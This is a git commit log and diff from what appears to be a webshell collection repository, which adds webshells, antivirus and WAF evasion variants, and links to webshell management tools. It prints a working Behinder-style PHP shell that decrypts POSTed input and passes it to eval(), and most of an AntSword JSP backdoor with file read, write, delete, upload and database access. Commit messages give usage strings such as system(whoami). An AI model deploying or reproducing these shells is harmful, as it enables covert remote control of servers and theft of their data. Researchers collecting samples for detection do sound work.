
tennc
9da9029fb0 Update README.md 2021-01-04 21:55:41 +08:00
tennc
8e77847595 add create_webshell_with_py.py @pureqh :💯
Create webshell
from:https://mp.weixin.qq.com/s/s0piu9qU8oq6M1qAZCyI4g
github: https://github.com/pureqh/webshell
author: pureqh
2021-01-04 21:54:14 +08:00
tennc
b59b949389 Create bypass-with-base32.php 2021-01-04 21:50:18 +08:00
tennc
eafae576c9 Create bypass2021-01-04-01.php
from https://mp.weixin.qq.com/s/s0piu9qU8oq6M1qAZCyI4g
2021-01-04 21:47:58 +08:00
tennc
a6546d03ee Create getConstants2.php
use: xxx/webshell/1?<>=system(whoami)
from : https://xz.aliyun.com/t/8684
2020-12-28 22:15:54 +08:00
tennc
fd35f195c1 Create getConstants.php
use: xxxxxx/getConstants?1=phpinfo()
from : https://xz.aliyun.com/t/8684
2020-12-28 01:08:19 +08:00
tennc
b66c3bb616 add YXNzZXJ0YWE.php bypass 啊D
from: https://xz.aliyun.com/t/8684
2020-12-28 01:05:10 +08:00
tennc
c9755402a6 add Webshell免杀的思考与学习.mhtml
from : https://xz.aliyun.com/t/8684
author: Isabellae
2020-12-28 01:02:49 +08:00
tennc
c7c6b39833 Create shell2020-12-06.php
password:rebeyond
2020-12-07 23:05:11 +08:00
tennc
f875e7b780 Create Shu1337.php
from: https://github.com/linuxsec/shu-shell
@linuxsec 👍
2020-11-18 22:20:42 +08:00
tennc
da33d92ba8 Update README_EN.md 2020-11-08 20:43:01 +08:00
tennc
9ef78d3996 Update README.md 2020-11-08 20:42:38 +08:00
tennc
9495a6c59e Rename README_ZH.md to README.md 2020-11-08 20:40:40 +08:00
tennc
0266c30801 Rename README.md to README_EN.md 2020-11-08 20:40:19 +08:00
tennc
9f63d98db5 Update README.md 2020-11-08 20:32:41 +08:00
tennc
e467712762 Create README_ZH.md
add README_ZH.md
2020-11-08 20:30:54 +08:00
tennc
3ffc1b6312 Merge pull request #40 from rubo77/patch-1
Reame: translate to english
2020-11-08 20:23:40 +08:00
Ruben Barkow-Kuder
fc276c0bb0 Reame: translate to english
I used mainly Google Translate, so I could have gotten some things wrong; please use this as a first step to translate your Readme into English.

you could leave the original as `Readme_zn.md` if you like
2020-11-07 14:27:28 +01:00
tennc
e9b09f671b Merge pull request #38 from RobinvandenHurk/patch-1
Fixed label
2020-10-22 23:26:08 +08:00
Robin van den Hurk
acb55c61bb Fixed label 2020-10-13 14:46:48 +02:00
tennc
7e6629ab49 Update README.md 2020-10-11 19:15:53 +08:00
tennc
7105ac90a5 Create get1.php
use: "`****`"

from: 19e3e0ab25

@thephenix4 👍
2020-10-11 19:11:12 +08:00
tennc
976ca14a7d Create webshell-without-alphanumeric2.php
what ?? 
from: 3ea2d589ae

@oktavandi 👍
2020-10-11 19:07:02 +08:00
tennc
823aa6ff59 add 冰蝎,从入门到魔改.pdf 2020-10-06 12:55:18 +08:00
tennc
67468c8243 add 冰蝎,从入门到魔改(续).pdf 2020-10-06 12:49:49 +08:00
tennc
df832d0366 Create cotent01.md
from : https://blog.mrcl0wn.com/2019/01/hold-door-hold-backdoor-php.html
2020-09-22 13:06:26 +08:00
tennc
dd21bebfc0 add some submodule webshell project to this project 2020-09-14 13:32:03 +08:00
tennc
25f1dc52ce Update README.md 2020-09-14 13:07:25 +08:00
tennc
222fc05087 Update README.md 2020-09-14 13:04:36 +08:00
tennc
ce94519fd0 Update README.md
add some project webshell link
2020-09-14 13:03:43 +08:00
tennc
31c6b56f25 Update other shell repository.md 2020-09-07 23:30:54 +08:00
tennc
5f3741952d Update and rename other shell repository to other shell repository.md 2020-09-07 23:30:07 +08:00
tennc
43d9582172 Create php_webshell.py
create bypass safedog webshell  with python
from : https://github.com/pureqh/webshell
thanks to pureqh 👍
2020-09-05 17:44:37 +08:00
tennc
0da00dfca4 add php马-bypass _ alin'Blog.pdf
from : http://alin.run/2020/08/04/php-webshell-bypass/
2020-09-03 21:08:06 +08:00
tennc
719eb9131d Create ass.php
请求时,设置Referer头,后面以”ass****”结尾即可,比如:Referer: http://www.target.com/ass.php。
在使用Cknife时,注意软件实现有缺陷,会从第二个”:”处截断,可改成Referer: http%3a//www.target.com/ass.php
from : http://alin.run/2020/08/04/php-webshell-bypass/
2020-09-03 21:00:49 +08:00
tennc
9fd273a5a5 Create webshell-detect-bypass
from : LandGrey 👍
2020-09-03 20:58:19 +08:00
tennc
aeaf7516dd add 从Webshell的视角谈攻防对抗.pdf
from : https://www.freebuf.com/articles/network/247359.html
2020-09-01 21:06:04 +08:00
tennc
3ab759a148 add Upload与WAF的那些事.pdf
from : http://www.0x3.biz/archives/1925.html
2020-09-01 21:01:53 +08:00
tennc
2bea3becb2 Create 2020-08-31-01.php
from: https://github.com/clm123321/tongda_oa_rce/blob/master/tongda.py#L145
2020-08-31 21:39:22 +08:00
tennc
a6acc071dd Delete CNAME 2020-08-30 15:16:02 +08:00
tennc
41e8490caf Delete CNAME 2020-08-30 15:14:38 +08:00
tennc
1f9390b340 Update CNAME
rewrite cname
2020-08-30 15:12:29 +08:00
tennc
e864fcd511 Create create_code_with_xor.py
create some code for php xor to bypass safedog
from : https://www.sqlsec.com/2020/07/shell.html#toc-heading-24
2020-08-30 14:05:29 +08:00
tennc
105f3ed358 Update README.md
add some project web site url
2020-08-29 15:33:12 +08:00
tennc
a83d9cb7e9 Update README.md
rewrite
2020-08-29 15:27:36 +08:00
tennc
349039f2d5 Merge pull request #35 from nil0x42/patch-1
Add `phpsploit` (C2 framework via PHP oneliner)
2020-08-29 15:25:06 +08:00
tennc
a09c535f6d Create bt_yincang_shell.md
from: https://mp.weixin.qq.com/s/-8JE1ovWKOorNr6MCAgejg
wx_id: 漏洞推送
2020-08-29 14:59:27 +08:00
nil0x42
57d76f059e Add phpsploit (C2 framework via PHP oneliner)
Add phpsploit tool (https://github.com/nil0x42/phpsploit):
Full-featured C2 framework which silently persists on webserver via evil PHP oneliner, with a complete arsenal of post-exploitation & privesc features
Ask me if you have any question 👍
2020-08-26 17:15:11 +00:00
tennc
3fb8abd7c9 Create php_custom_script_for_mysql_fix.php
fix php_custom_script_for_mysql_fix.php   乱码
2020-08-26 22:48:48 +08:00
tennc
e458de3dc7 Create python2_custom_script.py
add python2_custom_script.py
2020-08-26 22:47:31 +08:00
tennc
efe66a8e7b Create jspx_custom_script_for_mysql.jspx
add jspx_custom_script_for_mysql
2020-08-26 22:46:46 +08:00
tennc
c6f42dd08c Create jsp_custom_script_for_oracle.jsp
add jsp_custom_script_for_oracle.jsp
2020-08-26 22:46:05 +08:00
tennc
eae7182ca9 Create WebLogic_Shiro.md
thanks  Y4er
👍
2020-08-26 22:37:49 +08:00
tennc
fef331e3f2 add Godzilla-BypassOpenRasp.jar
add Godzilla-BypassOpenRasp.jar
2020-08-25 20:31:48 +08:00
tennc
cd55a03046 add WebShell免杀.pdf
add WebShell免杀.pdf
2020-08-22 19:33:50 +08:00
tennc
61b8a65a49 add 1个经典的过人 WebShell.pdf
add 1个经典的过人 WebShell.pdf
2020-08-22 19:24:17 +08:00
tennc
5c86bc3410 Create readme.md 2020-08-22 19:23:35 +08:00
tennc
62ccee518b Create bypass.md 2020-08-22 19:22:26 +08:00
tennc
23aea8530d Create 2020.08.20.20.php
maybe bypass safedog
from : https://www.sqlsec.com/2020/07/shell.html#toc-heading-24
2020-08-21 19:52:22 +08:00
tennc
cbd7b8ef98 Create 2020.08.20.19.php
bypass by safedog
https://www.sqlsec.com/2020/07/shell.html
2020-08-20 13:09:52 +08:00
tennc
12ad35eb0f Create 2020.08.20.18.php
bypass safedog
https://www.sqlsec.com/2020/07/shell.html
2020-08-20 13:08:25 +08:00
tennc
0d1874b235 Create 2020.08.20.17.php
killed by safedog
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 13:07:32 +08:00
tennc
cd1e25025a Create 2020.08.20.16.php
from : https://www.sqlsec.com/2020/07/shell.html
killed by safedog
2020-08-20 13:03:10 +08:00
tennc
ecc1fb09ee Create 2020.08.20.15.php
use:
shell.php?e=mb_eregi_replace
post x=phpinfo();
2020-08-20 12:48:04 +08:00
tennc
6a9169da6b Create 2020.08.20.14.php 2020-08-20 12:40:40 +08:00
tennc
44282fe412 Create 2020.08.20.13.php
shell.php?e=preg_replace ==> preg_replace('|.*|e',$_POST['x'],'')
use:  post x=phpinfo();
from: https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:38:26 +08:00
tennc
aeb2db1e19 Create 2020.08.20.12.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:35:58 +08:00
tennc
f7c1551c7f Create 2020.08.20.11.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:34:54 +08:00
tennc
accce9acef Create 2020.08.20.10.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:34:25 +08:00
tennc
63217f585d Create 2020.08.20.09.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:33:34 +08:00
tennc
69b4a7b5bc Create 2020.08.20.08.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:32:56 +08:00
tennc
a700c2b3d8 Create 2020.08.20.07.php
from : https://www.sqlsec.com/2020/07/shell.html
killled by safedog
2020-08-20 12:32:12 +08:00
tennc
d5f61a9c5f Create 2020.08.20.06.php
from : https://www.sqlsec.com/2020/07/shell.html
killed by safedog
2020-08-20 12:31:23 +08:00
tennc
d8cdd62ab1 Create 2020.08.20.05.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:30:06 +08:00
tennc
223d57c52c Create 2020.08.20.04.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:29:26 +08:00
tennc
6759fd8dcc Create 2020.08.20.03.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:28:46 +08:00
tennc
51833ad9b6 Create 2020.08.20.02.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:27:40 +08:00
tennc
820aadc6a1 Create 2020.08.20.01.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:26:04 +08:00
tennc
5a94f3e98b add Behinder_v3.0_Beta_1.zip 2020-08-19 22:19:34 +08:00
tennc
457530e937 Update README.md 2020-08-19 22:09:48 +08:00
tennc
74b1f33dbe add Godzilla client 2020-08-19 12:52:10 +08:00
83 changed files with 82781 additions and 88 deletions

60
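--- /dev/null
+++ b/.gitmodules
@@ -0,0 +1,60 @@
+[submodule "xl7dev/WebShell"]
+path = xl7dev/WebShell
+url = https://github.com/xl7dev/WebShell
+[submodule "JohnTroony/php-webshells"]
+path = JohnTroony/php-webshells
+url = https://github.com/JohnTroony/php-webshells
+[submodule "BlackArch/webshells"]
+path = BlackArch/webshells
+url = https://github.com/BlackArch/webshells
+[submodule "LandGrey/webshell-detect-bypass"]
+path = LandGrey/webshell-detect-bypass
+url = https://github.com/LandGrey/webshell-detect-bypass
+[submodule "JoyChou93/webshell"]
+path = JoyChou93/webshell
+url = https://github.com/JoyChou93/webshell
+[submodule "bartblaze/PHP-backdoors"]
+path = bartblaze/PHP-backdoors
+url = https://github.com/bartblaze/PHP-backdoors
+[submodule "WangYihang/Webshell-Sniper"]
+path = WangYihang/Webshell-Sniper
+url = https://github.com/WangYihang/Webshell-Sniper
+[submodule "threedr3am/JSP-Webshells"]
+path = threedr3am/JSP-Webshells
+url = https://github.com/threedr3am/JSP-Webshells
+[submodule "DeEpinGh0st/PHP-bypass-collection"]
+path = DeEpinGh0st/PHP-bypass-collection
+url = https://github.com/DeEpinGh0st/PHP-bypass-collection
+[submodule "lcatro/PHP-WebShell-Bypass-WAF"]
+path = lcatro/PHP-WebShell-Bypass-WAF
+url = https://github.com/lcatro/PHP-WebShell-Bypass-WAF
+[submodule "ysrc/webshell-sample"]
+path = ysrc/webshell-sample
+url = https://github.com/ysrc/webshell-sample
+[submodule "tanjiti/webshellSample"]
+path = tanjiti/webshellSample
+url = https://github.com/tanjiti/webshellSample
+[submodule "webshellpub/awsome-webshell"]
+path = webshellpub/awsome-webshell
+url = https://github.com/webshellpub/awsome-webshell
+[submodule "tdifg/WebShell"]
+path = tdifg/WebShell
+url = https://github.com/tdifg/WebShell
+[submodule "malwares/WebShell"]
+path = malwares/WebShell
+url = https://github.com/malwares/WebShell
+[submodule "lhlsec/webshell"]
+path = lhlsec/webshell
+url = https://github.com/lhlsec/webshell
+[submodule "oneoneplus/webshell"]
+path = oneoneplus/webshell
+url = https://github.com/oneoneplus/webshell
+[submodule "vnhacker1337/Webshell"]
+path = vnhacker1337/Webshell
+url = https://github.com/vnhacker1337/Webshell
+[submodule "backlion/webshell"]
+path = backlion/webshell
+url = https://github.com/backlion/webshell
+[submodule "AntSwordProject/AwesomeScript"]
+path = AntSwordProject/AwesomeScript
+url = https://github.com/AntSwordProject/AwesomeScript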


@@ -0,0 +1,26 @@
<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位默认连接密码rebeyond
$_SESSION['k']=$key;
$f=explode("|",base64_decode("ZmlsZV9nZXRfY29udGVudHN8YmFzZTY0X2RlY29kZXxwaHA6Ly9pbnB1dA=="));
$post=["bie"=>$f[0](end($f))];
$post=$post["bie"];
if(!extension_loaded('openssl'))
{
$post=$f[1]($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i] xor $key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>
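Review bot: The sample carries no provenance header, unlike the other files in this commit, and its only documentation is the Chinese comment on the `$key` line; a one-line English header such as `// sample: Behinder-style PHP shell (default connection password per the comment on $key); source: see commit message` would make the file self-describing for anyone cataloguing it for detection. From a detection standpoint the key is a hard-coded constant that the comment says is derived from the default password, and `openssl_decrypt($post, "AES128", $key)` passes no IV, so, as far as I can tell from the OpenSSL alias, the CBC decryption runs with an all-zero IV; the literal key, the base64 string on the `explode` line and the `$_SESSION['k']` assignment are therefore stable static indicators worth recording in that header. The XOR branch taken when openssl is absent reuses the same key via `$key[$i+1&15]`, so the same indicator applies there. `@error_reporting(0)` and `@call_user_func` silence PHP warnings, so failed decryptions will not appear in the server error log.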

1
BlackArch/webshells Submodule

Submodule BlackArch/webshells added at 0701fcb26c

1
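--- a/CNAME
+++ /dev/null
@@ -1 +0,0 @@
-shell.endp.top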


BIN
Godzilla/gesila.7z Normal file


1
JoyChou93/webshell Submodule

Submodule JoyChou93/webshell added at 2185acc2b4


@@ -1,5 +1,5 @@
webshell # webshell | [English](https://github.com/tennc/webshell/blob/master/README_EN.md)
========
这是一个webshell收集项目 这是一个webshell收集项目
送人玫瑰手有余香如果各位下载了本项目也请您能提交shell 送人玫瑰手有余香如果各位下载了本项目也请您能提交shell
@@ -23,10 +23,11 @@
> 2. 免杀webshell无限生成工具 > 2. 免杀webshell无限生成工具
> 3. 免杀webshell无限生成工具(免杀一句话生成|免杀D盾|免杀安全狗护卫神河马查杀等一切waf) > 3. 免杀webshell无限生成工具(免杀一句话生成|免杀D盾|免杀安全狗护卫神河马查杀等一切waf)
> 4. Author : yzddmr6 > 4. Author : yzddmr6
> 5. 请自行鉴别 > 5. https://github.com/pureqh/webshell
> 6. 请自行鉴别后门
> ### other webshell project (old) > ### other webshell project (update 2020-09-14)
> 1. [xl7dev/WebShell](https://github.com/xl7dev/WebShell) > 1. [xl7dev/WebShell](https://github.com/xl7dev/WebShell)
> 2. [JohnTroony/php-webshells](https://github.com/JohnTroony/php-webshells) > 2. [JohnTroony/php-webshells](https://github.com/JohnTroony/php-webshells)
> 3. [BlackArch/webshells](https://github.com/BlackArch/webshells) > 3. [BlackArch/webshells](https://github.com/BlackArch/webshells)
@@ -34,20 +35,34 @@
> 5. [JoyChou93/webshell](https://github.com/JoyChou93/webshell) > 5. [JoyChou93/webshell](https://github.com/JoyChou93/webshell)
> 6. [bartblaze/PHP-backdoors](https://github.com/bartblaze/PHP-backdoors) > 6. [bartblaze/PHP-backdoors](https://github.com/bartblaze/PHP-backdoors)
> 7. [WangYihang/Webshell-Sniper](https://github.com/WangYihang/Webshell-Sniper) > 7. [WangYihang/Webshell-Sniper](https://github.com/WangYihang/Webshell-Sniper)
> 8. [threedr3am/JSP-Webshells](https://github.com/threedr3am/JSP-Webshells)
> 9. [DeEpinGh0st/PHP-bypass-collection](https://github.com/DeEpinGh0st/PHP-bypass-collection)
> 10. [lcatro/PHP-WebShell-Bypass-WAF](https://github.com/lcatro/PHP-WebShell-Bypass-WAF)
> 11. [ysrc/webshell-sample](https://github.com/ysrc/webshell-sample)
> 12. [tanjiti/webshellSample](https://github.com/tanjiti/webshellSample)
> 13. [webshellpub/awsome-webshell](https://github.com/webshellpub/awsome-webshell)
> 14. [tdifg/WebShell](https://github.com/tdifg/WebShell)
> 15. [malwares/WebShell](https://github.com/malwares/WebShell)
> 16. [lhlsec/webshell](https://github.com/lhlsec/webshell)
> 17. [oneoneplus/webshell](https://github.com/oneoneplus/webshell)
> 18. [vnhacker1337/Webshell](https://github.com/vnhacker1337/Webshell)
> 19. [backlion/webshell](https://github.com/backlion/webshell)
> ### 顺便在推一波网站管理工具 > ### 顺便在推一波网站管理工具
> 1. 中国菜刀 > 1. 中国菜刀
> 2. Cknife > 2. Cknife
> 3. Altman > 3. [Altman](https://github.com/keepwn/Altman)
> 4. xise > 4. xise
> 5. Weevely > 5. [Weevely](https://github.com/epinna/weevely3)
> 6. quasibot > 6. [quasibot](https://github.com/Smaash/quasibot)
> 7. Webshell-Sniper > 7. [Webshell-Sniper](https://github.com/WangYihang/Webshell-Sniper)
> 8. 蚁剑 > 8. [蚁剑 antSword](https://github.com/AntSwordProject/antSword)
> 9. 冰蝎 > 9. [冰蝎 Behinder](https://github.com/rebeyond/Behinder)
> 10. webacoo > 10. [webacoo](https://github.com/anestisb/WeBaCoo)
> 11. 以上排名不分先后 > 11. [哥斯拉 Godzilla](https://github.com/BeichenDream/Godzilla)
> 12. [PhpSploit](https://github.com/nil0x42/phpsploit)
> 13. 以上排名不分先后

82
README_EN.md Normal file

@@ -0,0 +1,82 @@
webshell
[简体中文](https://github.com/tennc/webshell/blob/master/README.md)
========
This is a webshell collection project
*Give someone a rose, there is a fragrance in your hand*
if you download this project, please also submit a shell
This project covers various common scripts
Such as: asp, aspx, php, jsp, pl, py
If you submit a webshell, please do not change the name and password
Note: There is no guarantee whether there could be a backdoor in a shell, but I will never add a backdoor deliberately when uploading by myself
Please dont add a backdoor if you submit
If you find a backdoor code, please create an issue immediately!
The tools provided by this project are forbidden to engage in illegal activities. This project is for testing purposes only. All the consequences caused by it have nothing to do with me.
> ### Expanding a project
> 1. [webshell-venom](https://github.com/yzddmr6/webshell-venom)
> 2. Kill-free webshell unlimited generation tool
> 3. Kill-free webshell unlimited generation tool (Kill-free one sentence generation|Kill-free D shield|Kill-free security dog guard God Hippo check and kill everything waf)
> 4. Author : yzddmr6
> 5. Please identify yourself
> ### other webshell project (update 2020-09-14)
> 1. [xl7dev/WebShell](https://github.com/xl7dev/WebShell)
> 2. [JohnTroony/php-webshells](https://github.com/JohnTroony/php-webshells)
> 3. [BlackArch/webshells](https://github.com/BlackArch/webshells)
> 4. [LandGrey/webshell-detect-bypass](https://github.com/LandGrey/webshell-detect-bypass)
> 5. [JoyChou93/webshell](https://github.com/JoyChou93/webshell)
> 6. [bartblaze/PHP-backdoors](https://github.com/bartblaze/PHP-backdoors)
> 7. [WangYihang/Webshell-Sniper](https://github.com/WangYihang/Webshell-Sniper)
> 8. [threedr3am/JSP-Webshells](https://github.com/threedr3am/JSP-Webshells)
> 9. [DeEpinGh0st/PHP-bypass-collection](https://github.com/DeEpinGh0st/PHP-bypass-collection)
> 10. [lcatro/PHP-WebShell-Bypass-WAF](https://github.com/lcatro/PHP-WebShell-Bypass-WAF)
> 11. [ysrc/webshell-sample](https://github.com/ysrc/webshell-sample)
> 12. [tanjiti/webshellSample](https://github.com/tanjiti/webshellSample)
> 13. [webshellpub/awsome-webshell](https://github.com/webshellpub/awsome-webshell)
> 14. [tdifg/WebShell](https://github.com/tdifg/WebShell)
> 15. [malwares/WebShell](https://github.com/malwares/WebShell)
> 16. [lhlsec/webshell](https://github.com/lhlsec/webshell)
> 17. [oneoneplus/webshell](https://github.com/oneoneplus/webshell)
> 18. [vnhacker1337/Webshell](https://github.com/vnhacker1337/Webshell)
> 19. [backlion/webshell](https://github.com/backlion/webshell)
> ### By the way, we are pushing a wave of website management tools
> 1. Chinese Kitchen Knife
> 2. Cknife
> 3. [Altman](https://github.com/keepwn/Altman)
> 4. xise
> 5. [Weevely](https://github.com/epinna/weevely3)
> 6. [quasibot](https://github.com/Smaash/quasibot)
> 7. [Webshell-Sniper](https://github.com/WangYihang/Webshell-Sniper)
> 8. [蚁剑 antSword](https://github.com/AntSwordProject/antSword)
> 9. [冰蝎 Behinder](https://github.com/rebeyond/Behinder)
> 10. [webacoo](https://github.com/anestisb/WeBaCoo)
> 11. [哥斯拉 Godzilla](https://github.com/BeichenDream/Godzilla)
> 12. [PhpSploit](https://github.com/nil0x42/phpsploit)
> 13. The above rankings are in no particular order
Author tennc
http://tennc.github.io/webshell
license : GPL v3
## Download link
Check github releases. Latest:
[https://github.com/tennc/webshell/releases](https://github.com/tennc/webshell/releases)
## Sponsored by Jetbrains
## <img src="https://raw.githubusercontent.com/tennc/webshell/master/jetbrains.png" width="400"> Thanks to [Jetbrains](https://www.jetbrains.com/?from=webshell)


@@ -0,0 +1,15 @@
``` java
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
```
pass: alsdkj1l24wqasd123
use: URLClassLoader -> tttt.jar -> InjectFilterShell static -> defineClass byte -> AntSwordFilterShell
![antshell](https://github.com/Y4er/WebLogic-Shiro-shell/raw/master/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96.assets/antshell.gif)
author:Y4er
project:https://github.com/Y4er/WebLogic-Shiro-shell


@@ -0,0 +1,525 @@
<%--
_ ____ _
__ _ _ __ | |_/ ___|_ _____ _ __ __| |
/ _` | '_ \| __\___ \ \ /\ / / _ \| '__/ _` |
| (_| | | | | |_ ___) \ V V / (_) | | | (_| |
\__,_|_| |_|\__|____/ \_/\_/ \___/|_| \__,_|
———————————————————————————————————————————————
AntSword JSP Custom Script for Oracle
警告:
此脚本仅供合法的渗透测试以及爱好者参考学习
请勿用于非法用途,否则将追究其相关责任!
———————————————————————————————————————————————
说明:
1. AntSword >= v2.1.0
2. 创建 Shell 时选择 custom 模式连接
3. 数据库连接:
oracle.jdbc.driver.OracleDriver
jdbc:oracle:thin:@127.0.0.1:1521/test
user
password
注意以上是4行
4. 本脚本中 encoder/decoder 与 AntSword 添加 Shell 时选择的 encoder/decoder 要一致,如果选择 default 则需要将值设置为空
已知问题:
1. 文件管理遇到中文文件名显示的问题
ChangeLog:
v1.8
1. 修复由于decode函数与EC函数位置写反而导致的乱码问题
v1.7
1. 新增 AES 编码/解码 支持 (thx @Ch1ngg)
2. 新增 Version, 直接访问不带任何参数会返回当前 shell 的版本号
v1.6
1. 新增 4 种解码器支持
v1.5
1. 修正 base64 编码器下连接数据库 characterEncoding 出错
v1.4
1. 修正 windows 下基础路径获取盘符会出现小写的情况
v1.3
1. 修正上传文件超过1M时的bug
2. 修正weblogic war 包布署获取路径问题
3. 修正文件中文字符问题
Date: 2016/04/29 v1.2
1. 修正修改包含结束tag的文件会出错的 bug
Date: 2016/04/06 v1.1
1. 修正下载文件参数设置错误
2. 修正一些注释的细节
Date: 2016/03/26 v1
1. 文件系统 和 terminal 管理
2. mysql 数据库支持
3. 支持 base64 和 hex 编码
--%>
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*,javax.crypto.*,java.security.*,javax.crypto.spec.*" contentType="text/html;charset=UTF-8"%>
<%!
// #################################################################
String Pwd = "ant"; //连接密码
// 编码器
String encoder = ""; // default (明文)
// String encoder = "base64"; // base64
// String encoder = "hex"; // hex(推荐)
// String encoder = "aes"; // aes(加密方式见下文aes配置)
// 解码器
String decoder = ""; // default (明文)
// String decoder = "base64"; // base64 中文正常
// String decoder = "hex"; // hex 中文可能有问题
// String decoder = "hex_base64"; // hex(base64) // 中文正常
// String decoder = "aes_base64"; // aes(base64) (加密方式见下文aes配置)
// 其它配置
String cs = "UTF-8"; // 字符集编码
String SessionKey = "CUSTOMSESSID"; // 自定义sessionkey id
String RetS = "LT58"; // 数据起始分割符 base64
String RetE = "fDwt"; // 数据结束分割符 base64
// aes 加密配置项
/*
* aes-128-cfb_zero_padding:
* - aes_mode: CFB
* - aes_padding: NoPadding
* - aes_keylen: 16
* aes-256-ecb_zero_padding:
* - aes_mode: ECB
* - aes_padding: NoPadding
* - aes_keylen: 32
*/
// 注意: 以下4项为 encoder/decoder 共用
// 如果需要请求和返回采用不同方式, 自行修改
String aes_mode = "CFB"; // CBC|ECB|CFB|
String aes_padding = "NoPadding"; // NoPadding|PKCS5Padding|PKCS7Padding
int aes_keylen = 16; // 16|32 // 16(AES-128) 32(AES-256)
String aes_key_padding = "a"; // 获取到的 key 位数不够时填充字符
// ################################################################
String AesKey = "";
String Version = "1.7";
String EC(String s) throws Exception {
if(encoder.equals("hex") || encoder == "hex") return s;
return new String(s.getBytes(), cs);
}
String showDatabases(String encode, String conn) throws Exception {
String sql = "SELECT USERNAME FROM ALL_USERS ORDER BY 1";
String columnsep = "\t";
String rowsep = "";
return executeSQL(encode, conn, sql, columnsep, rowsep, false);
}
String showTables(String encode, String conn, String dbname) throws Exception {
String sql = "SELECT TABLE_NAME FROM (SELECT TABLE_NAME FROM ALL_TABLES WHERE OWNER='"+dbname+"' ORDER BY 1)";
String columnsep = "\t";
String rowsep = "";
return executeSQL(encode, conn, sql, columnsep, rowsep, false);
}
String showColumns(String encode, String conn, String dbname, String table) throws Exception {
String columnsep = "\t";
String rowsep = "";
String sql = "select * from " + dbname + "." + table + " WHERE ROWNUM=0";
return executeSQL(encode, conn, sql, columnsep, rowsep, true);
}
String query(String encode, String conn, String sql) throws Exception {
String columnsep = "\t|\t";
String rowsep = "\r\n";
return executeSQL(encode, conn, sql, columnsep, rowsep, true);
}
String executeSQL(String encode, String conn, String sql, String columnsep, String rowsep, boolean needcoluname)
throws Exception {
String ret = "";
conn = (EC(conn));
String[] x = conn.trim().replace("\r\n", "\n").split("\n");
Class.forName(x[0].trim());
String url = x[1];
Connection c = DriverManager.getConnection(url,x[2],x[3]);
Statement stmt = c.createStatement();
ResultSet rs = stmt.executeQuery(sql);
ResultSetMetaData rsmd = rs.getMetaData();
if (needcoluname) {
for (int i = 1; i <= rsmd.getColumnCount(); i++) {
String columnName = rsmd.getColumnName(i);
ret += columnName + columnsep;
}
ret += rowsep;
}
while (rs.next()) {
for (int i = 1; i <= rsmd.getColumnCount(); i++) {
String columnValue = rs.getString(i);
ret += columnValue + columnsep;
}
ret += rowsep;
}
return ret;
}
String WwwRootPathCode(String d) throws Exception {
String s = "";
if (!d.substring(0, 1).equals("/")) {
File[] roots = File.listRoots();
for (int i = 0; i < roots.length; i++) {
s += roots[i].toString().substring(0, 2) + "";
}
} else {
s += "/";
}
return s;
}
String FileTreeCode(String dirPath) throws Exception {
File oF = new File(dirPath), l[] = oF.listFiles();
String s = "", sT, sQ, sF = "";
java.util.Date dt;
String fileCode=(String)System.getProperties().get("file.encoding");
SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
for (int i = 0; i < l.length; i++) {
dt = new java.util.Date(l[i].lastModified());
sT = fm.format(dt);
sQ = l[i].canRead() ? "R" : "";
sQ += l[i].canWrite() ? " W" : "";
String nm = new String(l[i].getName().getBytes(fileCode), cs);
if (l[i].isDirectory()) {
s += nm + "/\t" + sT + "\t" + l[i].length() + "\t" + sQ + "\n";
} else {
sF += nm + "\t" + sT + "\t" + l[i].length() + "\t" + sQ + "\n";
}
}
s += sF;
return new String(s.getBytes(fileCode), cs);
}
String ReadFileCode(String filePath) throws Exception {
String l = "", s = "";
BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(filePath)), cs));
while ((l = br.readLine()) != null) {
s += l + "\r\n";
}
br.close();
return s;
}
String WriteFileCode(String filePath, String fileContext) throws Exception {
String h = "0123456789ABCDEF";
String fileHexContext = strtohexstr(fileContext);
File f = new File(filePath);
FileOutputStream os = new FileOutputStream(f);
for (int i = 0; i < fileHexContext.length(); i += 2) {
os.write((h.indexOf(fileHexContext.charAt(i)) << 4 | h.indexOf(fileHexContext.charAt(i + 1))));
}
os.close();
return "1";
}
String DeleteFileOrDirCode(String fileOrDirPath) throws Exception {
File f = new File(fileOrDirPath);
if (f.isDirectory()) {
File x[] = f.listFiles();
for (int k = 0; k < x.length; k++) {
if (!x[k].delete()) {
DeleteFileOrDirCode(x[k].getPath());
}
}
}
f.delete();
return "1";
}
void DownloadFileCode(String filePath, HttpServletResponse r) throws Exception {
int n;
byte[] b = new byte[512];
r.reset();
ServletOutputStream os = r.getOutputStream();
BufferedInputStream is = new BufferedInputStream(new FileInputStream(filePath));
os.write(("->"+"|").getBytes(), 0, 3);
while ((n = is.read(b, 0, 512)) != -1) {
os.write(b, 0, n);
}
os.write(("|"+"<-").getBytes(), 0, 3);
os.close();
is.close();
}
String UploadFileCode(String savefilePath, String fileHexContext) throws Exception {
String h = "0123456789ABCDEF";
File f = new File(savefilePath);
f.createNewFile();
FileOutputStream os = new FileOutputStream(f,true);
for (int i = 0; i < fileHexContext.length(); i += 2) {
os.write((h.indexOf(fileHexContext.charAt(i)) << 4 | h.indexOf(fileHexContext.charAt(i + 1))));
}
os.close();
return "1";
}
String CopyFileOrDirCode(String sourceFilePath, String targetFilePath) throws Exception {
